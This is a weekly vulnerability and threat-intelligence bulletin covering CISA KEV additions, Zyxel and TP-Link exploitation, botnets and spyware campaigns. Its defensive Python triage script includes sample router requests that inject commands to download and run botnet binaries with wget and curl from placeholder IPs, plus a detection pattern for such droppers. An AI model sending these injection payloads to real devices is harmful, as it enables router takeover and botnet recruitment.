Executive Summary
In this week’s cybersecurity developments, CISA added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, spanning the Linux Kernel, Apple's zero-click flaw, and a command injection bug in TP-Link routers. Meanwhile, GreyNoise reported active exploitation of a two-year-old Zyxel firewall vulnerability, highlighting continued threats targeting unpatched edge devices.
Botnet activity surged recently as threat actors ramped up exploitation campaigns leveraging malware families like EnemyBot, Sysrv-K, Andoryu, and Androxgh0st. These strains primarily targeted known vulnerabilities in widely used platforms such as Cloud Gateway, GitLab, and various PHP-based services. In parallel, IoT-focused threats including Bashlite, BrickerBot, Tsunami, and Mirai intensified their assaults on Eir D1000 modems, swiftly compromising exposed devices and expanding their presence across internet-facing infrastructure.
On the advanced threat front, multiple sophisticated operations were uncovered. Positive Technologies reported the exploitation of a Google Chrome zero-day by the threat actor Team46, while Trend Micro exposed a sophisticated campaign abusing a critical vulnerability in Langflow to deliver the Flodrix botnet. Furthermore, a zero-click flaw in Apple devices was weaponized to deploy Graphite spyware, underscoring the increasing scale of targeted surveillance operations.
Trending / Critical Vulnerabilities
The vulnerabilities listed here are the ones currently trending in public discussion and threat reporting; they are summarized so that readers can prioritize patching and monitoring decisions.
CVE-2025-43200
A zero-click logic vulnerability in the Messages application affecting multiple Apple platforms (iOS, iPadOS, macOS Sequoia, Sonoma and Ventura, watchOS and visionOS) was identified and addressed by Apple in February 2025. With a CVSS score of 9.8, the flaw allowed attackers to deploy spyware on targeted devices without any user interaction, which makes it particularly dangerous. Apple attributed the issue to a logic flaw triggered while processing a maliciously crafted photo or video shared via an iCloud Link. The company released security updates across all impacted platforms to address the vulnerability. Given its severity and confirmed use in the wild, the flaw has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, and organizations and users are urged to apply the available patches immediately.
CVE-2023-0386
An improper ownership management vulnerability in the Linux kernel's OverlayFS component allows local attackers to escalate privileges. With a high CVSS score of 7.8, the issue arises from incorrect handling of file ownership and capabilities during copy-up operations between mounts: a user can copy a setuid or capability-bearing file from a nosuid mount into another mount, and the copied file keeps its privileged attributes, which can result in unauthorized root-level access. Although a fix was merged in 2023, the vulnerability was recently added to CISA's Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation and the urgent need to patch affected Linux systems.
CVE-2023-33538
A command injection vulnerability affects the TP-Link router models TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2. With a high CVSS score of 8.8, the flaw resides in the /userRpm/WlanNetworkRpm component and can be exploited via the ssid1 GET parameter to execute arbitrary system commands. TP-Link has officially discontinued support for all three affected models, so they will not receive firmware updates or security patches. A proof-of-concept (PoC) exploit has been publicly released, but the extent of real-world exploitation and the actors behind it remain unconfirmed. Given the critical risk and the lack of any vendor mitigation, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and strongly urges users to discontinue use of these end-of-life devices.
CVE-2023-28771
An OS command injection vulnerability affects Zyxel firewall models in the ATP, USG FLEX, VPN, and ZyWALL/USG series. Assigned a CVSS score of 9.8, the flaw allows unauthenticated attackers to remotely execute system commands by sending specially crafted packets to an affected device. Zyxel addressed the issue in 2023 through the patched firmware releases ZLD V5.36 and ZLD V4.73 Patch 1. Nevertheless, recent threat intelligence from GreyNoise shows renewed exploitation: after a quiet first half of June, 244 unique IPs targeted this vulnerability on June 16, 2025, and none of them had shown any other exploit or scanning activity, which indicates a focused and most likely automated attack campaign.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Vulnerabilities identified as being exploited by botnets, including recent CVEs logged in MISP. We present the top 5 CVEs whose payloads are suggestive of botnet activity, for example a wget fetch of a second stage from a bare IP address.
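The heuristic behind that table (a payload that chains shell commands and pulls a second stage with wget, curl or tftp from a literal IPv4 address) can be expressed as a small triage script, shown here as an added example that is not Loginsoft or Cytellite code. It runs over constructed sensor-style request lines, not real telemetry; the only request path it maps to a CVE is the TP-Link /userRpm/WlanNetworkRpm endpoint with its ssid1 parameter described above, and everything else is reported as "unmapped". The log line format (timestamp, source IP, method, request target) is an assumption made for the example.

```python
"""Triage sensor-captured HTTP requests for botnet-style dropper payloads.

Added example, not Loginsoft/Cytellite code. Heuristic: a request whose query
chains shell commands and fetches a second stage with wget/curl/tftp from a raw
IPv4 address is characteristic of Mirai-family droppers; the request path maps
the attempt to the vulnerability being abused.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Paths named on this page mapped to their CVE; anything else is reported as "unmapped".
PATH_TO_CVE = {
    "/userRpm/WlanNetworkRpm": "CVE-2023-33538",  # TP-Link, injection via the ssid1 parameter
}

# Second-stage fetch from a literal IPv4 address, e.g. "wget http://198.51.100.9/bins/x86".
# The lazy [^;&|\n]*? keeps the match inside a single chained command.
DROPPER_RE = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^;&|\n]*?(?:[a-z]+://)?\b(\d{1,3}(?:\.\d{1,3}){3})\b",
    re.IGNORECASE,
)
# Shell chaining metacharacters that have no business inside an SSID or similar field.
SHELL_META_RE = re.compile(r"[;|`]|&&|\$\(")

# Constructed sample lines (not real sensor telemetry): time, source IP, method, target.
SAMPLE_LOG = """\
2025-06-16T09:12:41Z 203.0.113.7 GET /userRpm/WlanNetworkRpm?ssid1=abc;wget+http://198.51.100.9/bins/x86;sh+x86&Save=Save
2025-06-16T09:13:02Z 203.0.113.8 GET /userRpm/WlanNetworkRpm?ssid1=HomeWiFi&Save=Save
2025-06-16T09:14:55Z 192.0.2.44 GET /shell?cd+/tmp;curl+-O+http://192.0.2.99/bot.arm7;chmod+777+bot.arm7;./bot.arm7
2025-06-16T09:15:10Z 192.0.2.45 GET /index.html
2025-06-16T09:16:30Z 203.0.113.9 GET /userRpm/WlanNetworkRpm?ssid1=x%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbins%2Fmips%3Bsh%20mips
"""


def parse_line(line):
    """Split one sensor line into its four fields; None for malformed lines."""
    parts = line.split(maxsplit=3)
    if len(parts) != 4:
        return None
    ts, src, method, target = parts
    return {"ts": ts, "src": src, "method": method, "target": target}


def split_query(query):
    """Decode a query string into (name, value) pairs.

    Splits on '&' only: a ';' inside a field is payload, not a separator, which is
    exactly what an injection like ssid1=abc;wget ... relies on.
    """
    pairs = []
    for field in query.split("&"):
        if field:
            name, _, value = field.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify(target):
    """Return a finding for a request target, or None if it looks benign."""
    url = urlsplit(target)
    query = unquote_plus(url.query)  # '+' and %XX decoded, as the router CGI would see it
    dropper = DROPPER_RE.search(query)
    if not dropper and not SHELL_META_RE.search(query):
        return None
    # Name the parameter(s) whose name or value carries shell metacharacters.
    tainted = sorted({n for n, v in split_query(url.query)
                      if SHELL_META_RE.search(n) or SHELL_META_RE.search(v)})
    return {
        "cve": PATH_TO_CVE.get(url.path, "unmapped"),
        "path": url.path,
        "params": tainted,
        "stage2_host": dropper.group(1) if dropper else None,
        "botnet_like": dropper is not None,
    }


def analyze(log_text):
    """Run the heuristic over raw sensor text; one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec["target"])
        if hit:
            findings.append({**rec, **hit})
    return findings


def top_cves(findings, n=5):
    """Rank CVEs by count of botnet-like payloads, the way the top-5 table is built."""
    counts = Counter(f["cve"] for f in findings if f["botnet_like"])
    return counts.most_common(n)


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for h in hits:
        print(f'{h["src"]:15} {h["cve"]:14} {h["path"]} params={h["params"]} stage2={h["stage2_host"]}')
    print("top CVEs:", top_cves(hits))
```

The benign ssid1=HomeWiFi request on the same endpoint is deliberately left unflagged: the signal is the metacharacters and the fetch from a bare IP, not the path alone, so the script separates real exploitation attempts from ordinary scanning of the same URL.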
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is analyzed manually and mapped to MITRE ATT&CK tactics and techniques. The information comes from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2025-2783
A recently patched vulnerability in Google Chrome, CVE-2025-2783, was exploited in the wild as a zero-day by a threat actor known as Team46 (also tracked as TaxOff) to deploy a backdoor named Trinper. The activity, discovered in mid-March 2025 by researchers at Positive Technologies, began with a phishing email containing a malicious link. Clicking the link triggered a one-click sandbox escape exploit for the Chrome vulnerability, allowing silent installation of the Trinper backdoor. Written in C++, Trinper uses multithreading to carry out a range of malicious tasks, including capturing system information, logging keystrokes, collecting documents with specific extensions (.doc, .xls, .ppt, .rtf, .pdf), and maintaining persistent communication with a remote command-and-control server, through which TaxOff issued commands and exfiltrated the stolen data. Given the severity and stealth of the campaign, organizations are strongly urged to apply the Google Chrome security update without delay.
CVE-2025-3248
Trend Micro has identified an ongoing and sophisticated campaign exploiting this missing-authentication vulnerability in Langflow, a widely used open-source framework for building AI-driven applications. Successful exploitation lets threat actors deploy the Flodrix botnet, a stealthy and adaptive malware strain designed for both persistence and disruption.
Once installed, Flodrix establishes command-and-control (C&C) communication over both plain TCP and the Tor anonymity network to evade detection. It then performs extensive environment reconnaissance and dumps system variables to assess the host's capabilities. The botnet also identifies and terminates watchdog processes, BusyBox instances, and potentially competing malicious scripts stored under /tmp, consolidating its hold on the device. Beyond its stealth features, Flodrix can launch a wide array of distributed denial-of-service (DDoS) attacks, using methods it names tcpraw, udpplain, handshake, and ts3 to overwhelm targeted networks.
CVE-2025-43200
According to Citizen Lab, this zero-click vulnerability in Apple devices was used to deploy Paragon's Graphite spyware, a commercial surveillance platform linked to targeted cyber-espionage operations. Delivered through a zero-click iMessage exploit against devices running iOS 18.2.1, the attack required no user interaction. Once the flaw was triggered, the spyware silently contacted a command-and-control server (46.183.184[.]91) and installed its surveillance components in the background. Forensic analysis showed that the exploit was used to target the Italian journalist Ciro Pellegrino and a prominent European journalist.
CVE-2023-28771
On June 16, 2025, GreyNoise detected a sharp spike in exploitation attempts against CVE-2023-28771, a critical remote code execution vulnerability in Zyxel firewalls. The flaw, located in the Internet Key Exchange (IKE) packet decoder, can be triggered by crafted UDP packets sent to port 500. A total of 244 unique IPs were observed attempting exploitation within a short window, suggesting a coordinated and automated campaign. The attack patterns align with known Mirai botnet variants, indicating active botnet-driven targeting of unpatched IoT and edge devices. Targeted regions include the U.S., U.K., Spain, Germany and India.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI platform aggregates and distributes data on them from open sources and social media; it currently tracks over 100 security alerts and is planned to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/06/17/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.greynoise.io/blog/exploit-attempts-targeting-zyxel-cve-2023-28771
- https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin
- https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/
- https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html